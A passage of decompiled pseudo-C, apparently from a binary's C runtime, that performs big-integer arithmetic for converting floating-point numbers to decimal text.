                                                                                                									_t1077 = _t1208 >> 0x14;
                                                                                                									_t788 = _t1077 & 0x000007ff;
                                                                                                									__eflags = _t788;
                                                                                                									if(_t788 != 0) {
                                                                                                										_t788 = 0;
                                                                                                										_t1140 = 0x100000;
                                                                                                										_t1036 = 0;
                                                                                                										__eflags = 0;
                                                                                                									} else {
                                                                                                										_t1140 = 0;
                                                                                                										_t1036 = 1;
                                                                                                									}
                                                                                                									_t1209 = _t1208 & 0x000fffff;
                                                                                                									_v1888 = _v1916 + _t788;
                                                                                                									asm("adc esi, edx");
                                                                                                									_t1078 = _t1077 & 0x000007ff;
                                                                                                									_v1868 = _t1078 + _t1036;
                                                                                                									E00FB2990(_t1078, _t1260);
                                                                                                									_push(_t1078);
                                                                                                									_push(_t1078);
                                                                                                									 *_t1247 = _t1260;
                                                                                                									E00FB2AA0(_t1078, _v1916 + _t788);
                                                                                                									_t1081 = E00FB3E90(_t1140);
                                                                                                									_v1900 = _t1081;
                                                                                                									_t1172 = 0x20;
                                                                                                									__eflags = _t1081 - 0x7fffffff;
                                                                                                									if(_t1081 == 0x7fffffff) {
                                                                                                										L22:
                                                                                                										__eflags = 0;
                                                                                                										_v1900 = 0;
                                                                                                									} else {
                                                                                                										__eflags = _t1081 - 0x80000000;
                                                                                                										if(_t1081 == 0x80000000) {
                                                                                                											goto L22;
                                                                                                										}
                                                                                                									}
                                                                                                									_t1141 = _v1868;
                                                                                                									__eflags = _t1209;
                                                                                                									_v468 = _v1888;
                                                                                                									_v464 = _t1209;
                                                                                                									_v936 = _v936 & 0x00000000;
                                                                                                									_t1039 = (0 | _t1209 != 0x00000000) + 1;
                                                                                                									_v472 = _t1039;
                                                                                                									__eflags = _t1141 - 0x433;
                                                                                                									if(_t1141 < 0x433) {
                                                                                                										__eflags = _t1141 - 0x35;
                                                                                                										if(_t1141 == 0x35) {
                                                                                                											L110:
                                                                                                											_t795 =  *((intOrPtr*)(_t1244 + _t1039 * 4 - 0x1d4));
                                                                                                											_t204 =  &_v1912;
                                                                                                											 *_t204 = _v1912 & 0x00000000;
                                                                                                											__eflags =  *_t204;
                                                                                                											asm("bsr eax, eax");
                                                                                                											if( *_t204 == 0) {
                                                                                                												_t796 = 0;
                                                                                                												__eflags = 0;
                                                                                                											} else {
                                                                                                												_t796 = _t795 + 1;
                                                                                                											}
                                                                                                											_t1210 = _t1039;
                                                                                                											_t1173 = _t1172 - _t796;
                                                                                                											__eflags = _t1173;
                                                                                                											_v1888 = _t1210;
                                                                                                											_t1082 = _t1210;
                                                                                                											_t798 =  &(( &_v472)[_t1210]);
                                                                                                											_v1884 = _t798;
                                                                                                											_t1211 = _t798;
                                                                                                											while(1) {
                                                                                                												__eflags = _t1082 - _t1039;
                                                                                                												if(_t1082 >= _t1039) {
                                                                                                													_t215 =  &_v1872;
                                                                                                													 *_t215 = _v1872 & 0x00000000;
                                                                                                													__eflags =  *_t215;
                                                                                                												} else {
                                                                                                													_v1872 =  *(_t1244 + _t1082 * 4 - 0x1d0);
                                                                                                												}
                                                                                                												_t217 = _t1082 - 1; // -1
                                                                                                												__eflags = _t217 - _t1039;
                                                                                                												if(_t217 >= _t1039) {
                                                                                                													_t1142 = 0;
                                                                                                													__eflags = 0;
                                                                                                												} else {
                                                                                                													_t1142 =  *_t1211;
                                                                                                												}
                                                                                                												_t1211 = _t1211 - 4;
                                                                                                												 *(_t1244 + _t1082 * 4 - 0x1d0) = _t1142 >> 0x0000001f | _v1872 + _v1872;
                                                                                                												_t1082 = _t1082 - 1;
                                                                                                												__eflags = _t1082 - 0xffffffff;
                                                                                                												if(_t1082 == 0xffffffff) {
                                                                                                													break;
                                                                                                												}
                                                                                                												_t1039 = _v472;
                                                                                                											}
                                                                                                											_t1212 = _v1888;
                                                                                                											__eflags = _t1173 - 1;
                                                                                                											if(_t1173 >= 1) {
                                                                                                												_v472 = _t1212;
                                                                                                											} else {
                                                                                                												_v472 = _t1212 + 1;
                                                                                                											}
                                                                                                											_t1175 = 0x434 >> 5;
                                                                                                											E00F95A00(0x434 >> 5,  &_v1396, 0, 0x434);
                                                                                                											__eflags = 1;
                                                                                                											 *(_t1244 + 0xbad63d) = 1 << (0x00000434 - _v1868 & 0x0000001f);
                                                                                                										} else {
                                                                                                											_v1396 = _v1396 & 0x00000000;
                                                                                                											_v1392 = 0x100000;
                                                                                                											_v1400 = 2;
                                                                                                											__eflags = _t1209;
                                                                                                											if(_t1209 != 0) {
                                                                                                												_t1111 = 0;
                                                                                                												__eflags = 0;
                                                                                                												while(1) {
                                                                                                													_t968 =  *((intOrPtr*)(_t1244 + _t1111 - 0x570));
                                                                                                													__eflags = _t968 -  *((intOrPtr*)(_t1244 + _t1111 - 0x1d0));
                                                                                                													if(_t968 !=  *((intOrPtr*)(_t1244 + _t1111 - 0x1d0))) {
                                                                                                														goto L110;
                                                                                                													}
                                                                                                													_t1111 = _t1111 + 4;
                                                                                                													__eflags = _t1111 - 8;
                                                                                                													if(_t1111 != 8) {
                                                                                                														continue;
                                                                                                													} else {
                                                                                                														_t174 =  &_v1912;
                                                                                                														 *_t174 = _v1912 & 0x00000000;
                                                                                                														__eflags =  *_t174;
                                                                                                														asm("bsr eax, esi");
                                                                                                														if( *_t174 == 0) {
                                                                                                															_t969 = 0;
                                                                                                															__eflags = 0;
                                                                                                														} else {
                                                                                                															_t969 = _t968 + 1;
                                                                                                														}
                                                                                                														_t1230 = _t1039;
                                                                                                														_t1193 = _t1172 - _t969;
                                                                                                														__eflags = _t1193;
                                                                                                														_v1888 = _t1230;
                                                                                                														_t1112 = _t1230;
                                                                                                														_t971 =  &(( &_v472)[_t1230]);
                                                                                                														_v1884 = _t971;
                                                                                                														_t1231 = _t971;
                                                                                                														while(1) {
                                                                                                															__eflags = _t1112 - _t1039;
                                                                                                															if(_t1112 >= _t1039) {
                                                                                                																_t185 =  &_v1872;
                                                                                                																 *_t185 = _v1872 & 0x00000000;
                                                                                                																__eflags =  *_t185;
                                                                                                															} else {
                                                                                                																_v1872 =  *(_t1244 + _t1112 * 4 - 0x1d0);
                                                                                                															}
                                                                                                															_t187 = _t1112 - 1; // -1
                                                                                                															__eflags = _t187 - _t1039;
                                                                                                															if(_t187 >= _t1039) {
                                                                                                																_t1155 = 0;
                                                                                                																__eflags = 0;
                                                                                                															} else {
                                                                                                																_t1155 =  *_t1231;
                                                                                                															}
                                                                                                															_t1231 = _t1231 - 4;
                                                                                                															 *(_t1244 + _t1112 * 4 - 0x1d0) = _t1155 >> 0x0000001e | _v1872 << 0x00000002;
                                                                                                															_t1112 = _t1112 - 1;
                                                                                                															__eflags = _t1112 - 0xffffffff;
                                                                                                															if(_t1112 == 0xffffffff) {
                                                                                                																break;
                                                                                                															}
                                                                                                															_t1039 = _v472;
                                                                                                														}
                                                                                                														_t1232 = _v1888;
                                                                                                														__eflags = _t1193 - 2;
                                                                                                														if(_t1193 >= 2) {
                                                                                                															_v472 = _t1232;
                                                                                                														} else {
                                                                                                															_v472 = _t1232 + 1;
                                                                                                														}
                                                                                                														_t1175 = 0x435 >> 5;
                                                                                                														E00F95A00(0x435 >> 5,  &_v1396, 0, 0x435);
                                                                                                														 *(_t1244 + 0xbad63d) = 1 << (0x00000435 - _v1868 & 0x0000001f);
                                                                                                													}
                                                                                                													goto L126;
                                                                                                												}
                                                                                                											}
                                                                                                											goto L110;
                                                                                                										}
                                                                                                										L126:
                                                                                                										_t807 = _t1175 + 1;
                                                                                                										_t1043 = 0x1cc;
                                                                                                										_v1400 = _t807;
                                                                                                										_v936 = _t807;
                                                                                                										__eflags = _t807 << 2;
                                                                                                										E00FA009F( &_v932, 0x1cc,  &_v1396, _t807 << 2);
                                                                                                										_t1250 =  &(_t1247[7]);
                                                                                                									} else {
                                                                                                										_v1396 = _v1396 & 0x00000000;
                                                                                                										_v1392 = 0x100000;
                                                                                                										_v1400 = 2;
                                                                                                										__eflags = _t1209;
                                                                                                										if(_t1209 == 0) {
                                                                                                											L59:
                                                                                                											_t981 = _t1141 - 0x432;
                                                                                                											_t982 = _t981 & 0x0000001f;
                                                                                                											_t1236 = _t981 >> 5;
                                                                                                											_v1868 = _t982;
                                                                                                											_v1876 = _t1236;
                                                                                                											_v1888 = _t1172 - _t982;
                                                                                                											_t985 = E00FB3C00(1, _t1172 - _t982, 0);
                                                                                                											_t1116 =  *((intOrPtr*)(_t1244 + _t1039 * 4 - 0x1d4));
                                                                                                											_t986 = _t985 - 1;
                                                                                                											_t118 =  &_v1912;
                                                                                                											 *_t118 = _v1912 & 0x00000000;
                                                                                                											__eflags =  *_t118;
                                                                                                											asm("bsr ecx, ecx");
                                                                                                											_v1908 = _t986;
                                                                                                											_v1884 =  !_t986;
                                                                                                											if( *_t118 == 0) {
                                                                                                												_t988 = 0;
                                                                                                												__eflags = 0;
                                                                                                											} else {
                                                                                                												_t988 = _t1116 + 1;
                                                                                                											}
                                                                                                											_t1160 = _t1039 + _t1236;
                                                                                                											_t1195 = _t1172 - _t988;
                                                                                                											_v1880 = _t1195;
                                                                                                											_v1892 = _t1160;
                                                                                                											__eflags = _t1160 - 0x73;
                                                                                                											if(_t1160 != 0x73) {
                                                                                                												L65:
                                                                                                												_t1117 = 0;
                                                                                                												__eflags = 0;
                                                                                                											} else {
                                                                                                												__eflags = _v1868 - _t1195;
                                                                                                												if(_v1868 <= _t1195) {
                                                                                                													goto L65;
                                                                                                												} else {
                                                                                                													_t1117 = 1;
                                                                                                												}
                                                                                                											}
                                                                                                											__eflags = _t1160 - 0x73;
                                                                                                											if(_t1160 > 0x73) {
                                                                                                												L87:
                                                                                                												__eflags = 0;
                                                                                                												_t1043 = 0x1cc;
                                                                                                												_v1400 = 0;
                                                                                                												_v472 = 0;
                                                                                                												E00FA009F( &_v468, 0x1cc,  &_v1396, 0);
                                                                                                												_t1247 =  &(_t1247[4]);
                                                                                                											} else {
                                                                                                												__eflags = _t1117;
                                                                                                												if(_t1117 != 0) {
                                                                                                													goto L87;
                                                                                                												} else {
                                                                                                													__eflags = _t1160 - 0x72;
                                                                                                													if(_t1160 >= 0x72) {
                                                                                                														_t1160 = 0x72;
                                                                                                														_v1892 = _t1160;
                                                                                                													}
                                                                                                													_t1118 = _t1160;
                                                                                                													_v1896 = _t1118;
                                                                                                													__eflags = _t1160 - 0xffffffff;
                                                                                                													if(_t1160 != 0xffffffff) {
                                                                                                														_t1198 = _v1876;
                                                                                                														_t1238 = _t1160 - _t1198;
                                                                                                														__eflags = _t1238;
                                                                                                														_t1162 =  &_v468 + _t1238 * 4;
                                                                                                														while(1) {
                                                                                                															__eflags = _t1118 - _t1198;
                                                                                                															if(_t1118 < _t1198) {
                                                                                                																break;
                                                                                                															}
                                                                                                															__eflags = _t1238 - _t1039;
                                                                                                															if(_t1238 >= _t1039) {
                                                                                                																_t1001 = 0;
                                                                                                																__eflags = 0;
                                                                                                															} else {
                                                                                                																_t1001 =  *_t1162;
                                                                                                															}
                                                                                                															_v1872 = _t1001;
                                                                                                															__eflags = _t1238 - 1 - _t1039;
                                                                                                															if(_t1238 - 1 >= _t1039) {
                                                                                                																_t1003 = 0;
                                                                                                																__eflags = 0;
                                                                                                															} else {
                                                                                                																_t1003 =  *(_t1162 - 4);
                                                                                                															}
                                                                                                															_t1162 = _t1162 - 4;
                                                                                                															_t1123 = _v1896;
                                                                                                															 *(_t1244 + _t1123 * 4 - 0x1d0) = (_t1003 & _v1884) >> _v1888 | (_v1872 & _v1908) << _v1868;
                                                                                                															_t1118 = _t1123 - 1;
                                                                                                															_t1238 = _t1238 - 1;
                                                                                                															_v1896 = _t1118;
                                                                                                															__eflags = _t1118 - 0xffffffff;
                                                                                                															if(_t1118 != 0xffffffff) {
                                                                                                																_t1039 = _v472;
                                                                                                																continue;
                                                                                                															}
                                                                                                															break;
                                                                                                														}
                                                                                                														_t1160 = _v1892;
                                                                                                														_t1195 = _v1880;
                                                                                                														_t1236 = _v1876;
                                                                                                													}
                                                                                                													__eflags = _t1236;
                                                                                                													if(_t1236 != 0) {
                                                                                                														__eflags = 0;
                                                                                                														memset( &_v468, 0, _t1236 << 2);
                                                                                                														_t1247 =  &(_t1247[3]);
                                                                                                														_t1195 = _v1880;
                                                                                                													}
                                                                                                													_t1043 = 0x1cc;
                                                                                                													__eflags = _v1868 - _t1195;
                                                                                                													if(_v1868 <= _t1195) {
                                                                                                														_v472 = _t1160;
                                                                                                													} else {
                                                                                                														_v472 = _t1160 + 1;
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                											_v1392 = _v1392 & 0x00000000;
                                                                                                											_v1396 = 2;
                                                                                                											_v1400 = 1;
                                                                                                											_v936 = 1;
                                                                                                											_push(4);
                                                                                                										} else {
                                                                                                											_t1124 = 0;
                                                                                                											__eflags = 0;
                                                                                                											while(1) {
                                                                                                												__eflags =  *((intOrPtr*)(_t1244 + _t1124 - 0x570)) -  *((intOrPtr*)(_t1244 + _t1124 - 0x1d0));
                                                                                                												if( *((intOrPtr*)(_t1244 + _t1124 - 0x570)) !=  *((intOrPtr*)(_t1244 + _t1124 - 0x1d0))) {
                                                                                                													goto L59;
                                                                                                												}
                                                                                                												_t1124 = _t1124 + 4;
                                                                                                												__eflags = _t1124 - 8;
                                                                                                												if(_t1124 != 8) {
                                                                                                													continue;
                                                                                                												} else {
                                                                                                													_t1008 = _t1141 - 0x431;
                                                                                                													_t1009 = _t1008 & 0x0000001f;
                                                                                                													_t1240 = _t1008 >> 5;
                                                                                                													_v1868 = _t1009;
                                                                                                													_v1872 = _t1240;
                                                                                                													_v1908 = _t1172 - _t1009;
                                                                                                													_t1012 = E00FB3C00(1, _t1172 - _t1009, 0);
                                                                                                													_t1127 =  *((intOrPtr*)(_t1244 + _t1039 * 4 - 0x1d4));
                                                                                                													_t1013 = _t1012 - 1;
                                                                                                													_t61 =  &_v1912;
                                                                                                													 *_t61 = _v1912 & 0x00000000;
                                                                                                													__eflags =  *_t61;
                                                                                                													asm("bsr ecx, ecx");
                                                                                                													_v1884 = _t1013;
                                                                                                													_v1888 =  !_t1013;
                                                                                                													if( *_t61 == 0) {
                                                                                                														_t1015 = 0;
                                                                                                														__eflags = 0;
                                                                                                													} else {
                                                                                                														_t1015 = _t1127 + 1;
                                                                                                													}
                                                                                                													_t1164 = _t1039 + _t1240;
                                                                                                													_t1199 = _t1172 - _t1015;
                                                                                                													_v1880 = _t1199;
                                                                                                													_v1896 = _t1164;
                                                                                                													__eflags = _t1164 - 0x73;
                                                                                                													if(_t1164 != 0x73) {
                                                                                                														L34:
                                                                                                														_t1128 = 0;
                                                                                                														__eflags = 0;
                                                                                                													} else {
                                                                                                														__eflags = _v1868 - _t1199;
                                                                                                														if(_v1868 <= _t1199) {
                                                                                                															goto L34;
                                                                                                														} else {
                                                                                                															_t1128 = 1;
                                                                                                														}
                                                                                                													}
                                                                                                													__eflags = _t1164 - 0x73;
                                                                                                													if(_t1164 > 0x73) {
                                                                                                														L56:
                                                                                                														__eflags = 0;
                                                                                                														_t1043 = 0x1cc;
                                                                                                														_v1400 = 0;
                                                                                                														_v472 = 0;
                                                                                                														E00FA009F( &_v468, 0x1cc,  &_v1396, 0);
                                                                                                														_t1247 =  &(_t1247[4]);
                                                                                                													} else {
                                                                                                														__eflags = _t1128;
                                                                                                														if(_t1128 != 0) {
                                                                                                															goto L56;
                                                                                                														} else {
                                                                                                															__eflags = _t1164 - 0x72;
                                                                                                															if(_t1164 >= 0x72) {
                                                                                                																_t1164 = 0x72;
                                                                                                																_v1896 = _t1164;
                                                                                                															}
                                                                                                															_t1131 = _t1164;
                                                                                                															_v1892 = _t1131;
                                                                                                															__eflags = _t1164 - 0xffffffff;
                                                                                                															if(_t1164 != 0xffffffff) {
                                                                                                																_t1202 = _v1872;
                                                                                                																_t1242 = _t1164 - _t1202;
                                                                                                																__eflags = _t1242;
                                                                                                																_t1166 =  &_v468 + _t1242 * 4;
                                                                                                																while(1) {
                                                                                                																	__eflags = _t1131 - _t1202;
                                                                                                																	if(_t1131 < _t1202) {
                                                                                                																		break;
                                                                                                																	}
                                                                                                																	__eflags = _t1242 - _t1039;
                                                                                                																	if(_t1242 >= _t1039) {
                                                                                                																		_t1024 = 0;
                                                                                                																		__eflags = 0;
                                                                                                																	} else {
                                                                                                																		_t1024 =  *_t1166;
                                                                                                																	}
                                                                                                																	_v1876 = _t1024;
                                                                                                																	__eflags = _t1242 - 1 - _t1039;
                                                                                                																	if(_t1242 - 1 >= _t1039) {
                                                                                                																		_t1026 = 0;
                                                                                                																		__eflags = 0;
                                                                                                																	} else {
                                                                                                																		_t1026 =  *(_t1166 - 4);
                                                                                                																	}
                                                                                                																	_t1166 = _t1166 - 4;
                                                                                                																	_t1136 = _v1892;
                                                                                                																	 *(_t1244 + _t1136 * 4 - 0x1d0) = (_t1026 & _v1888) >> _v1908 | (_v1876 & _v1884) << _v1868;
                                                                                                																	_t1131 = _t1136 - 1;
                                                                                                																	_t1242 = _t1242 - 1;
                                                                                                																	_v1892 = _t1131;
                                                                                                																	__eflags = _t1131 - 0xffffffff;
                                                                                                																	if(_t1131 != 0xffffffff) {
                                                                                                																		_t1039 = _v472;
                                                                                                																		continue;
                                                                                                																	}
                                                                                                																	break;
                                                                                                																}
                                                                                                																_t1164 = _v1896;
                                                                                                																_t1199 = _v1880;
                                                                                                																_t1240 = _v1872;
                                                                                                															}
                                                                                                															__eflags = _t1240;
                                                                                                															if(_t1240 != 0) {
                                                                                                																__eflags = 0;
                                                                                                																memset( &_v468, 0, _t1240 << 2);
                                                                                                																_t1247 =  &(_t1247[3]);
                                                                                                																_t1199 = _v1880;
                                                                                                															}
                                                                                                															_t1043 = 0x1cc;
                                                                                                															__eflags = _v1868 - _t1199;
                                                                                                															if(_v1868 <= _t1199) {
                                                                                                																_v472 = _t1164;
                                                                                                															} else {
                                                                                                																_v472 = _t1164 + 1;
                                                                                                															}
                                                                                                														}
                                                                                                													}
                                                                                                													_v1392 = _v1392 & 0x00000000;
                                                                                                													_t1020 = 4;
                                                                                                													__eflags = 1;
                                                                                                													_v1396 = _t1020;
                                                                                                													_v1400 = 1;
                                                                                                													_v936 = 1;
                                                                                                													_push(_t1020);
                                                                                                												}
                                                                                                												goto L58;
                                                                                                											}
                                                                                                											goto L59;
                                                                                                										}
                                                                                                										L58:
                                                                                                										_push( &_v1396);
                                                                                                										_push(_t1043);
                                                                                                										_push( &_v932);
                                                                                                										E00FA009F();
                                                                                                										_t1250 =  &(_t1247[4]);
                                                                                                									}
                                                                                                									_t812 = _v1900;
                                                                                                									_t1084 = 0xa;
                                                                                                									_v1888 = _t1084;
                                                                                                									__eflags = _t812;
                                                                                                									if(_t812 < 0) {
                                                                                                										_t813 =  ~_t812;
                                                                                                										_t814 = _t813 / _t1084;
                                                                                                										_t1139 = _t813 % _t1084;
                                                                                                										_v1892 = _t814;
                                                                                                										_t1085 = _t813 % _t1084;
                                                                                                										_v1912 = _t1085;
                                                                                                										__eflags = _t814;
                                                                                                										if(_t814 == 0) {
                                                                                                											L249:
                                                                                                											__eflags = _t1085;
                                                                                                											if(_t1085 != 0) {
                                                                                                												_t853 =  *(0xfbc34c + _t1085 * 4);
                                                                                                												_v1912 = _t853;
                                                                                                												__eflags = _t853;
                                                                                                												if(_t853 == 0) {
                                                                                                													L260:
                                                                                                													__eflags = 0;
                                                                                                													_push(0);
                                                                                                													_v472 = 0;
                                                                                                													_v2408 = 0;
                                                                                                													goto L261;
                                                                                                												} else {
                                                                                                													__eflags = _t853 - 1;
                                                                                                													if(_t853 != 1) {
                                                                                                														_t1096 = _v472;
                                                                                                														__eflags = _t1096;
                                                                                                														if(_t1096 != 0) {
                                                                                                															_t1181 = 0;
                                                                                                															_t1218 = 0;
                                                                                                															__eflags = 0;
                                                                                                															do {
                                                                                                																_t1139 = _t853 *  *(_t1244 + _t1218 * 4 - 0x1d0) >> 0x20;
                                                                                                																 *(_t1244 + _t1218 * 4 - 0x1d0) = _t853 *  *(_t1244 + _t1218 * 4 - 0x1d0) + _t1181;
                                                                                                																_t853 = _v1912;
                                                                                                																asm("adc edx, 0x0");
                                                                                                																_t1218 = _t1218 + 1;
                                                                                                																_t1181 = _t1139;
                                                                                                																__eflags = _t1218 - _t1096;
                                                                                                															} while (_t1218 != _t1096);
                                                                                                															__eflags = _t1181;
                                                                                                															if(_t1181 != 0) {
                                                                                                																_t860 = _v472;
                                                                                                																__eflags = _t860 - 0x73;
                                                                                                																if(_t860 >= 0x73) {
                                                                                                																	goto L260;
                                                                                                																} else {
                                                                                                																	 *(_t1244 + _t860 * 4 - 0x1d0) = _t1181;
                                                                                                																	_v472 = _v472 + 1;
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                										} else {
                                                                                                											do {
                                                                                                												__eflags = _t814 - 0x26;
                                                                                                												if(_t814 > 0x26) {
                                                                                                													_t814 = 0x26;
                                                                                                												}
                                                                                                												_t1097 =  *(0xfbc2b6 + _t814 * 4) & 0x000000ff;
                                                                                                												_v1868 = _t814;
                                                                                                												_v1400 = ( *(0xfbc2b6 + _t814 * 4) & 0x000000ff) + ( *(0xfbc2b7 + _t814 * 4) & 0x000000ff);
                                                                                                												E00F95A00(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
                                                                                                												_t871 = E00F96240( &(( &_v1396)[_t1097]), 0xfbb9b0 + ( *(0xfbc2b4 + _v1868 * 4) & 0x0000ffff) * 4, ( *(0xfbc2b7 + _t814 * 4) & 0x000000ff) << 2);
                                                                                                												_t1184 = _v1400;
                                                                                                												_t1250 =  &(_t1250[6]);
                                                                                                												__eflags = _t1184 - 1;
                                                                                                												if(_t1184 > 1) {
                                                                                                													__eflags = _v472 - 1;
                                                                                                													if(_v472 > 1) {
                                                                                                														__eflags = _t1184 - _v472;
                                                                                                														_t1139 =  &_v1396;
                                                                                                														_t502 = _t1184 - _v472 > 0;
                                                                                                														__eflags = _t502;
                                                                                                														_t872 = _t871 & 0xffffff00 | _t502;
                                                                                                														if(_t502 >= 0) {
                                                                                                															_t1139 =  &_v468;
                                                                                                														}
                                                                                                														_v1876 = _t1139;
                                                                                                														_t1098 =  &_v468;
                                                                                                														__eflags = _t872;
                                                                                                														if(_t872 == 0) {
                                                                                                															_t1098 =  &_v1396;
                                                                                                														}
                                                                                                														_v1908 = _t1098;
                                                                                                														__eflags = _t872;
                                                                                                														if(_t872 == 0) {
                                                                                                															_t1099 = _v472;
                                                                                                															_v1896 = _t1099;
                                                                                                														} else {
                                                                                                															_t1099 = _t1184;
                                                                                                															_v1896 = _t1184;
                                                                                                														}
                                                                                                														__eflags = _t872;
                                                                                                														if(_t872 != 0) {
                                                                                                															_t1184 = _v472;
                                                                                                														}
                                                                                                														_t873 = 0;
                                                                                                														_t1220 = 0;
                                                                                                														_v1864 = 0;
                                                                                                														__eflags = _t1099;
                                                                                                														if(_t1099 == 0) {
                                                                                                															L243:
                                                                                                															_v472 = _t873;
                                                                                                															_t874 = _t873 << 2;
                                                                                                															__eflags = _t874;
                                                                                                															_push(_t874);
                                                                                                															_t875 =  &_v1860;
                                                                                                															goto L244;
                                                                                                														} else {
                                                                                                															do {
                                                                                                																__eflags =  *(_t1139 + _t1220 * 4);
                                                                                                																if( *(_t1139 + _t1220 * 4) != 0) {
                                                                                                																	_t1139 = 0;
                                                                                                																	_t1100 = _t1220;
                                                                                                																	_v1880 = _v1880 & 0;
                                                                                                																	_v1872 = 0;
                                                                                                																	__eflags = _t1184;
                                                                                                																	if(_t1184 == 0) {
                                                                                                																		L240:
                                                                                                																		__eflags = _t1100 - 0x73;
                                                                                                																		if(_t1100 == 0x73) {
                                                                                                																			goto L258;
                                                                                                																		} else {
                                                                                                																			_t1099 = _v1896;
                                                                                                																			_t1139 = _v1876;
                                                                                                																			goto L242;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		while(1) {
                                                                                                																			__eflags = _t1100 - 0x73;
                                                                                                																			if(_t1100 == 0x73) {
                                                                                                																				goto L235;
                                                                                                																			}
                                                                                                																			__eflags = _t1100 - _t873;
                                                                                                																			if(_t1100 == _t873) {
                                                                                                																				 *(_t1244 + _t1100 * 4 - 0x740) =  *(_t1244 + _t1100 * 4 - 0x740) & 0x00000000;
                                                                                                																				_t893 = _v1880 + 1 + _t1220;
                                                                                                																				__eflags = _t893;
                                                                                                																				_v1864 = _t893;
                                                                                                																			}
                                                                                                																			_t886 =  *(_v1908 + _v1880 * 4);
                                                                                                																			_t1151 = _v1876;
                                                                                                																			_t1139 = _t886 *  *(_t1151 + _t1220 * 4) >> 0x20;
                                                                                                																			asm("adc edx, 0x0");
                                                                                                																			 *(_t1244 + _t1100 * 4 - 0x740) =  *(_t1244 + _t1100 * 4 - 0x740) + _t886 *  *(_t1151 + _t1220 * 4) + _v1872;
                                                                                                																			asm("adc edx, 0x0");
                                                                                                																			_t890 = _v1880 + 1;
                                                                                                																			_t1100 = _t1100 + 1;
                                                                                                																			_v1880 = _t890;
                                                                                                																			__eflags = _t890 - _t1184;
                                                                                                																			_v1872 = _t1139;
                                                                                                																			_t873 = _v1864;
                                                                                                																			_v1928 = _t1139;
                                                                                                																			if(_t890 != _t1184) {
                                                                                                																				continue;
                                                                                                																			} else {
                                                                                                																				goto L235;
                                                                                                																			}
                                                                                                																			while(1) {
                                                                                                																				L235:
                                                                                                																				__eflags = _t1139;
                                                                                                																				if(_t1139 == 0) {
                                                                                                																					goto L240;
                                                                                                																				}
                                                                                                																				__eflags = _t1100 - 0x73;
                                                                                                																				if(_t1100 == 0x73) {
                                                                                                																					goto L258;
                                                                                                																				} else {
                                                                                                																					__eflags = _t1100 - _t873;
                                                                                                																					if(_t1100 == _t873) {
                                                                                                																						_t559 = _t1244 + _t1100 * 4 - 0x740;
                                                                                                																						 *_t559 =  *(_t1244 + _t1100 * 4 - 0x740) & 0x00000000;
                                                                                                																						__eflags =  *_t559;
                                                                                                																						_t565 = _t1100 + 1; // 0x1
                                                                                                																						_v1864 = _t565;
                                                                                                																					}
                                                                                                																					_t884 = _t1139;
                                                                                                																					_t1139 = 0;
                                                                                                																					 *(_t1244 + _t1100 * 4 - 0x740) =  *(_t1244 + _t1100 * 4 - 0x740) + _t884;
                                                                                                																					_t873 = _v1864;
                                                                                                																					asm("adc edx, edx");
                                                                                                																					_t1100 = _t1100 + 1;
                                                                                                																					continue;
                                                                                                																				}
                                                                                                																				goto L246;
                                                                                                																			}
                                                                                                																			goto L240;
                                                                                                																		}
                                                                                                																		goto L235;
                                                                                                																	}
                                                                                                																} else {
                                                                                                																	__eflags = _t1220 - _t873;
                                                                                                																	if(_t1220 == _t873) {
                                                                                                																		 *(_t1244 + _t1220 * 4 - 0x740) =  *(_t1244 + _t1220 * 4 - 0x740) & 0x00000000;
                                                                                                																		_t521 = _t1220 + 1; // 0x1
                                                                                                																		_t873 = _t521;
                                                                                                																		_v1864 = _t873;
                                                                                                																	}
                                                                                                																	goto L242;
                                                                                                																}
                                                                                                																goto L246;
                                                                                                																L242:
                                                                                                																_t1220 = _t1220 + 1;
                                                                                                																__eflags = _t1220 - _t1099;
                                                                                                															} while (_t1220 != _t1099);
                                                                                                															goto L243;
                                                                                                														}
                                                                                                													} else {
                                                                                                														_t1221 = _v468;
                                                                                                														_v1928 = _t1221;
                                                                                                														_v472 = _t1184;
                                                                                                														E00FA009F( &_v468, _t1043,  &_v1396, _t1184 << 2);
                                                                                                														_t1250 =  &(_t1250[4]);
                                                                                                														__eflags = _t1221;
                                                                                                														if(_t1221 == 0) {
                                                                                                															goto L202;
                                                                                                														} else {
                                                                                                															__eflags = _t1221 - 1;
                                                                                                															if(_t1221 == 1) {
                                                                                                																goto L245;
                                                                                                															} else {
                                                                                                																__eflags = _v472;
                                                                                                																if(_v472 == 0) {
                                                                                                																	goto L245;
                                                                                                																} else {
                                                                                                																	_t1101 = 0;
                                                                                                																	_t1185 = _v1928;
                                                                                                																	_t1222 = 0;
                                                                                                																	__eflags = 0;
                                                                                                																	_t1051 = _v472;
                                                                                                																	do {
                                                                                                																		_t902 = _t1185;
                                                                                                																		_t1139 = _t902 *  *(_t1244 + _t1222 * 4 - 0x1d0) >> 0x20;
                                                                                                																		 *(_t1244 + _t1222 * 4 - 0x1d0) = _t902 *  *(_t1244 + _t1222 * 4 - 0x1d0) + _t1101;
                                                                                                																		asm("adc edx, 0x0");
                                                                                                																		_t1222 = _t1222 + 1;
                                                                                                																		_t1101 = _t1139;
                                                                                                																		__eflags = _t1222 - _t1051;
                                                                                                																	} while (_t1222 != _t1051);
                                                                                                																	goto L207;
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t1186 = _v1396;
                                                                                                													__eflags = _t1186;
                                                                                                													if(_t1186 != 0) {
                                                                                                														__eflags = _t1186 - 1;
                                                                                                														if(_t1186 == 1) {
                                                                                                															goto L245;
                                                                                                														} else {
                                                                                                															__eflags = _v472;
                                                                                                															if(_v472 == 0) {
                                                                                                																goto L245;
                                                                                                															} else {
                                                                                                																_t1102 = 0;
                                                                                                																_t1223 = 0;
                                                                                                																__eflags = 0;
                                                                                                																_t1050 = _v472;
                                                                                                																do {
                                                                                                																	_t907 = _t1186;
                                                                                                																	_t1139 = _t907 *  *(_t1244 + _t1223 * 4 - 0x1d0) >> 0x20;
                                                                                                																	 *(_t1244 + _t1223 * 4 - 0x1d0) = _t907 *  *(_t1244 + _t1223 * 4 - 0x1d0) + _t1102;
                                                                                                																	asm("adc edx, 0x0");
                                                                                                																	_t1223 = _t1223 + 1;
                                                                                                																	_t1102 = _t1139;
                                                                                                																	__eflags = _t1223 - _t1050;
                                                                                                																} while (_t1223 != _t1050);
                                                                                                																L207:
